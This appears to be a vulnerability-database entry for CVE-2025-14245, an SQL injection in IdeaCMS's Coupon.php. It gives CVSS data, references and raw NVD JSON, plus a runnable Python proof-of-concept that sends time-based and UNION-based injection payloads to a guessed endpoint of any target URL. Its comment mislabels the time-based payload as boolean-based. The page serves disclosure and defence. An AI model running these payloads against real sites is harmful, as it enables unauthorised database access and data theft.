CVE-2025-14245

Description

A vulnerability has been found in IdeaCMS up to 1.8. This affects the function whereRaw of the file app/common/logic/index/Coupon.php. Such manipulation of the argument params leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ideacms:ideacms:*:*:*:*:*:*:*:* - VULNERABLE

IdeaCMS <= 1.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14245 PoC - IdeaCMS SQL Injection in Coupon.php whereRaw function
# Target: IdeaCMS <= 1.8
# Vulnerability: SQL Injection via params parameter in whereRaw function

def exploit_sql_injection(target_url):
    """
    Exploit SQL injection vulnerability in IdeaCMS Coupon.php whereRaw function
    """
    # Vulnerable endpoint (typical IdeaCMS structure)
    endpoint = f"{target_url}/index/coupon/index"
    
    # SQL Injection payload - extracts database version
    # Using boolean-based blind injection technique
    payload = {
        'params': "1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- "
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-14245 SQL Injection...")
    
    try:
        response = requests.get(endpoint, params=payload, timeout=10)
        print(f"[+] Request sent to {endpoint}")
        print(f"[+] Status Code: {response.status_code}")
        
        # Check for time-based injection response
        if response.elapsed.total_seconds() >= 5:
            print("[+] Time-based SQL injection confirmed!")
            
        # Example: UNION-based injection to extract data
        union_payload = {
            'params': "1' UNION SELECT 1,2,3,4,version(),6,7,8,9,10-- "
        }
        print("[*] Trying UNION-based injection...")
        response = requests.get(endpoint, params=union_payload, timeout=10)
        print(f"[+] Response length: {len(response.text)}")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/ideacms")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14245
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14245
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14245/
[4] VulDB https://vuldb.com/cve/CVE-2025-14245
[5] https://github.com/rassec2/dbcve/issues/17
[6] https://vuldb.com/?ctiid.334755
[7] https://vuldb.com/?id.334755
[8] https://vuldb.com/?submit.702437

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14245", "sourceIdentifier": "[email protected]", "published": "2025-12-08T13:15:46.893", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in IdeaCMS up to 1.8. This affects the function whereRaw of the file app/common/logic/index/Coupon.php. Such manipulation of the argument params leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ideacms:ideacms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.8", "matchCriteriaId": "84751526-458D-4E50-9867-2E3E0E2915C0"}]}]}], "references": [{"url": "https://github.com/rassec2/dbcve/issues/17", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334755", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334755", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.702437", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}